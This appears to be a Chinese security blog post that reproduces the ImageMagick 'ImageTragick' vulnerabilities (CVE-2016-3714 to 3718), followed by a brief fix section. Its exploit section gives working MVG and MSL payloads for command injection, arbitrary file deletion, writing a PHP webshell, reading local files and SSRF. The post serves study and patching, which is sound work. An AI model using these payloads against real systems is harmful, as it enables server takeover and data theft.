【漏洞复现】ImageMagick命令注入漏洞(CVE-2016–3714/15/16/17/18)

最新推荐文章于 2024-07-22 09:54:13 发布
最新推荐文章于 2024-07-22 09:54:13 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52923241/article/details/129931723
版权

文章目录

1. 简介

ImageMagic是一款图片处理工具,当传入一个恶意图片时,就有可能存在命令注入漏洞。

ImageMagick默认支持一种图片格式mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。

影响ImageMagick 6.9.3-9以前的所有版本

2. CVE-2016-3714漏洞原理

ImageMagick有一个功能叫做delegate(委托),作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行的。

在ImageMagick的默认配置文件/etc/ImageMagick/delegates.xml里可以看到所有的委托:这里它定义了很多占位符,比如%i是输入的文件名,%l是图片exif label信息。而在后面command的位置,%i和%l等占位符被拼接在命令行中。这个漏洞也因此而来,被拼接完毕的命令行传入了系统的system函数,而我们只需使用反引号(`)或闭合双引号,来执行任意命令。

漏洞触发点:

<delegate decode="https" command="&quot;curl&quot; -s -k -o &quot;%o&quot; &quot;https:%M&quot;"/>

command=" "curl" -s -k -o "%o" "https:%M" "/>

尝试利用%M注入,双引号闭合url然后利用通管符进行命令执行

3. 利用

CVE-2016-3714 POC:

以下形式可以被检测为mvg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context

在这里插入图片描述
除了可以查看id,还可以注入其他命令:pwd、whoami
在这里插入图片描述

在这里插入图片描述

CVE-2016-3715 POC:

利用ImageMagick支持的ephemeral协议,来删除任意文件

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
popgraphic-context

CVE-2016-3716 POC:

利用ImageMagick支持的msl协议,来进行文件的读取和写入。msl协议是读取一个msl格式的xml文件,并根据其内容执行一些操作:

file_move.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'msl:/tmp/msl.txt'
popgraphic-context

/tmp/msl.txt
-=-=-=-=-=-=-=-=-
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/tmp/image.gif" />
<write filename="/var/www/shell.php" />
</image>

CVE-2016-3717 POC:

可以造成本地文件读取漏洞:

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@/etc/hosts'
pop graphic-context

CVE-2016-3718 POC:

利用mvg格式中可以包含url的特点,进行SSRF攻击

push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context

4. 修复

  • 升级为最新版本
  • 处理图片前,先检查图片的 magic bytes,也就是图片头,如果图片头不是你想要的格式,那么就不调用ImageMagick处理图片。如果你是php用户,可以使用getimagesize函数来检查图片格式,而如果你是wordpress等web应用的使用者,可以暂时卸载ImageMagick,使用php自带的gd库来处理图片。
  • 使用policy file来防御这个漏洞,这个文件默认位置在 /etc/ImageMagick/policy.xml ,我们通过配置如下的xml来禁止解析https等敏感操作
吃_早餐
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 984
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞CVE-20163714
JiangBuLiu的博客
07-10 1904
Imagetragick 命令执行漏洞CVE-20163714)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置上传POC反弹shell POC Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/imagemagick/imagetragick/README.zh-cn.md 漏...
vulhub漏洞复现27_Imagemagick
weixin_44193247的博客
02-02 997
vulhub漏洞复现练习篇
[CVE-20163714]-Imagetragick 命令执行漏洞复现
https://www.cnblogs.com/zpchcbd/
08-13 732
路径:/root/vulhub/imagemagick/imagetragick 搭建:docker-compose up -d 打开地址:存在三个文件demo.php upload.php vul.jpg vul.jpg是攻击的模板 push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg...
ImageMagick 命令注入漏洞 (CVE-2023-34153)
最新发布
无问社区的博客
07-22 311
HVV开始了之后会更新部分相关的指南和总结,本文是漏洞的一个复现~
ImageMagick命令注入漏洞(CVE-20163714)复现笔记
u011975363的专栏
06-18 2315
学习资料 https://www.cnblogs.com/bmjoker/p/9898590.html https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html 漏洞原理 ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。 但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 国外的安全人员为此新建了一个网站:
ImageMagick任意文件读取漏洞CVE-2022-44268)vulhub漏洞复现
qq_53003652的博客
07-31 367
ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。在ImageMagick 7.1.0-51版本及以前,其处理PNG文件的代码中存在一处功能,会导致转换图片时读取到当前操作系统上的任意文件,并将文件内容输出在图片内容中。访问ip:8080 有一个文件上传的页面,功能是将用户上传的任意图片缩小成50x50的PNG图片。4.使用poc.py读取下载的图片。5./etc/passwd读取成功。2.执行poc生成恶意图片。
ImageMagick漏洞演示
hello_simon的专栏
05-05 2517
centos安装 wgethttp://downloads.jmagick.org/6.4.0/ImageMagick-6.4.0-0.tar.gz tar zvxf ImageMagick-6.4.0-0.tar.gz cd ImageMagick-6.4.0-0 ./configure --prefix=/usr/locate/ImageMagick-6.4.0 --with
CVE-2016-3714, ImaegMagick代码执行( CVE 2016 3714 ).zip
09-17
CVE-2016-3714, ImaegMagick代码执行( CVE 2016 3714 ) CVE-2016-3714ImageMagick代码执行( CVE-2016-3714 )imagick_builder.py = 简单负载生成器利用 CVE-2016-3714基于 imagick_bypass_shell.ph
Vulhub - Imagetragick 命令执行漏洞CVE-20163714
多崎巡礼的博客
12-20 1369
金盾第一天居然是复现漏洞唉。。。 安装docker等等 1.安装docker wget https://apt.dockerproject.org/repo/pool/main/d/docker-engine/docker-engine_17.05.0~ce-0~debian-jessie_amd64.deb dpkg -i docker-engine_17.05.0~ce-0~debian-j...
GhostScript 沙箱绕过(命令执行)CVE-2018-16509/6116/19475/ 漏洞
weixin_51387754的博客
11-24 1035
标题 browse——ghost.png 提交 submit Query
ImageMagick
$firecat利白的代码足迹$
12-02 342
使用ImageMagick的创建,编辑,撰写,或转换位图图像。它可以读取和写入各种格式(超过200种)的图像,包括PNG,JPEG,GIF,HEIC,TIFF,DPX,EXR,WebP,Postscript,PDF和SVG。使用ImageMagick可以调整图像大小,翻转,镜像,旋转,变形,剪切和变换图像,调整图像颜色,应用各种特殊效果或绘制文本,线条,多边形,椭圆和贝塞尔曲线。 ImageMa...
Imagemagick PDF密码位置命令注入漏洞CVE-2020-29599)复现
玄道的网安博客
04-07 1093
漏洞概述 ImageMagick是一款使用量很广的图片处理程序,ImageMagick之前6.9.11-40和7。在7.0.10-40之前的x错误地处理了-authenticate选项,该选项允许为密码保护的PDF文件设置密码。用户控制的密码没有被正确转义,因此可以通过构造好的SVG格式图片文件,即可在Imagemagick注入任意命令。 环境搭建 https://github.com/vulhub/vulhub/tree/master/imagemagick/CVE-2020-...
Imagetragick 命令执行漏洞CVE-20163714
weixin_30376453的博客
07-25 385
Imagetragick介绍: ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞命令执行漏洞是出在 ImageMagick 对 https 形式的文件处理的过程中。 ImageMagick 之所以支...
Imagemagick 命令注入漏洞 (CVE-20163714)
zzzzz1284的博客
01-16 158
CVE-20163714
ImageMagick命令注入漏洞(CVE-20163714)
HEAVEN569的博客
06-28 1161
震惊!!看图片也能中招!
Imagetragick 命令执行漏洞CVE-2016-3714
EC_Carrot的博客
07-01 505
漏洞背景 ImageMagick是美国ImageMagick Studio公司的一套开源的图象处理软件。该软件可读取、转换、写入多种格式的图片。 ImageMagick 6.9.3-10之前版本和7.0.1-1之前7.x版本的多个编码器(EPHEMERAL,HTTPS,MVG,MSL,TEXT,SHOW,WIN,PLT)中存在远程代码执行漏洞,该漏洞源于程序没有充分过滤用户传入的shell字符。攻击者可通过上传恶意的图像利用该漏洞执行任意代码,获取敏感信息。 漏洞复现 访问http://your-ip:80
(环境搭建+复现) CVE-20163714 Imagetragick 命令执行漏洞
daxi0ng的博客
12-04 575
简单复现利用记录一下 在vulhub Imagetragick 文件夹下执行 docker-compose build && docker-compose up -d ps:如果80端口被占用,更改一下映射端口配置docker-compose.yml 在这里插入图片描述 这样服务就启动在ip:1234** 先来Getshell冷静一下 ** push graphic-conte...
CVE-2016-8707
09-03
CVE-2016-8707是一种安全漏洞,具体详情需要通过查看相关链接来获取更多信息。此链接提供了下载ImageMagick软件的rpm文件和安装的命令。安装过程中需要先安装ImageMagick-libs-7.0.10-29.x86_64.rpm,然后再安装ImageMagick-7.0.10-29.x86_64.rpm。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [升级ImageMagick到最新版本,修复 ImageMagick拒绝服务漏洞(CVE-2017-1000476)和ImageMagick远程...2016-8707)](https://blog.csdn.net/qq_42120178/article/details/108621697)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃_早餐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值